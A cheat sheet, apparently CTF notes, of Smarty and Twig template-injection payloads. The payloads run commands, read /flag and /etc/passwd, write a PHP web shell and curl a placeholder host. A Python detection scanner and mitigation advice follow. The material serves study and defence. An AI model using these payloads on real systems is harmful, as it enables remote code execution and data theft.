Mainly a record of some payloads.
Smarty:
{if readfile('/flag')}{/if}    PHP statements can be executed inside Smarty's {if} tag
{$smarty.version}    returns the version information
${smarty.template}    returns the file name of the current template
Use the {php}{/php} tag to execute the PHP code wrapped inside it (deprecated since version 3.1)
{self::getStreamVariable(“file:
{literal}alert('xss');{/literal}
{literal}<script language="php">phpinfo();</script>{/literal}    PHP 5.x
{system("id")}    the simplest and most boring one
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
{php}echo `id`;{/php}
Twig:
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter('cat /flag')}}
{{["id"]|map("system")|join(",")}}
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}
{{'/etc/passwd'|file_excerpt(-1,-1)}}
{{app.request.query.filter(0,'curl${IFS}x.x.x.x:8090',1024,{'options':'system'})}}
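The Smarty and Twig payloads above share a small set of recognizable shapes: a Smarty {if} tag whose condition is a function call, the {php} tag, the $smarty reserved variable, a static class call, and Twig's _self.env access or a callback filter (map/filter/sort/reduce) that receives a PHP function name. The following detection script is an added example, not code from the original page; it turns those shapes into signatures and runs them over a few constructed, URL-encoded access-log lines so a defender can flag SSTI probing in request parameters. Signature names, the SAMPLE_LOG contents and the regexes are the example's own assumptions, tuned to the payloads listed here rather than to every possible variant.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the Smarty and Twig payloads listed on this page.
# Each entry is (name, compiled regex). The patterns are deliberately narrow so
# that ordinary text or JSON containing a single brace does not fire.
SIGNATURES = [
    ("smarty_if_tag_call",   re.compile(r"\{if\s+\w+\s*\(", re.I)),
    ("smarty_php_tag",       re.compile(r"\{php\}", re.I)),
    ("smarty_reserved_var",  re.compile(r"\{\$?smarty\.(version|template)\}", re.I)),
    ("smarty_static_call",   re.compile(r"\{(?:self|Smarty_\w+)::\w+\(", re.I)),
    ("smarty_literal_php",   re.compile(r"\{literal\}.*?<script\s+language=[\"']php[\"']", re.I | re.S)),
    ("twig_self_env",        re.compile(r"\{\{.*?_self\.env\.", re.S)),
    ("twig_callback_filter", re.compile(
        r"\|\s*(map|filter|sort|reduce)\s*\(\s*[\"'](system|passthru|exec|shell_exec|file_put_contents)[\"']",
        re.I)),
    ("twig_file_excerpt",    re.compile(r"\|\s*file_excerpt\s*\(")),
    ("twig_app_request",     re.compile(r"\{\{.*?app\.request\.query\.filter\(", re.S)),
]


def scan_for_ssti(value):
    """Return the names of all signatures matching the URL-decoded value."""
    decoded = unquote_plus(value)  # attackers normally send payloads percent-encoded
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines):
    """Run the scanner over log lines; return {line_no: [hits]} for lines that fired."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = scan_for_ssti(line)
        if found:
            hits[n] = found
    return hits


# Constructed sample access-log lines (not real traffic). Lines 2 and 5 are
# benign controls: a plain value and a JSON object that contains braces.
SAMPLE_LOG = [
    "GET /index.php?name=%7Bif+system%28%27ls%27%29%7D%7B%2Fif%7D",
    "GET /index.php?name=alice",
    "GET /?q=%7B%7B%5B%22id%22%5D%7Cmap%28%22system%22%29%7Cjoin%28%22%2C%22%29%7D%7D",
    "GET /?tpl=%7B%24smarty.version%7D",
    "GET /?json=%7B%22a%22%3A1%7D",
    "GET /?q=%7B%7B_self.env.registerUndefinedFilterCallback%28%22system%22%29%7D%7D",
]

if __name__ == "__main__":
    for line_no, names in scan_log(SAMPLE_LOG).items():
        print(f"line {line_no}: {', '.join(names)}  <- {unquote_plus(SAMPLE_LOG[line_no - 1])}")
```

Treat a hit as a trigger for alerting and for checking that the rendering code never passes user input into a template source string; the scanner is a detection aid, not a fix. The actual mitigation is to keep user data in template variables only, and to enable the engine's restriction features (Smarty's security policy object, Twig's sandbox extension) so that callback filters and static class calls are not reachable from template content.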
Links:
Complete summary of template injection vulnerabilities: https://cloud.tencent.com/developer/article/1516336
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
Twig 3.x with Symfony SSTI: https://xz.aliyun.com/t/7507
SSTI payloads that work across all Twig versions: https://xz.aliyun.com/t/7518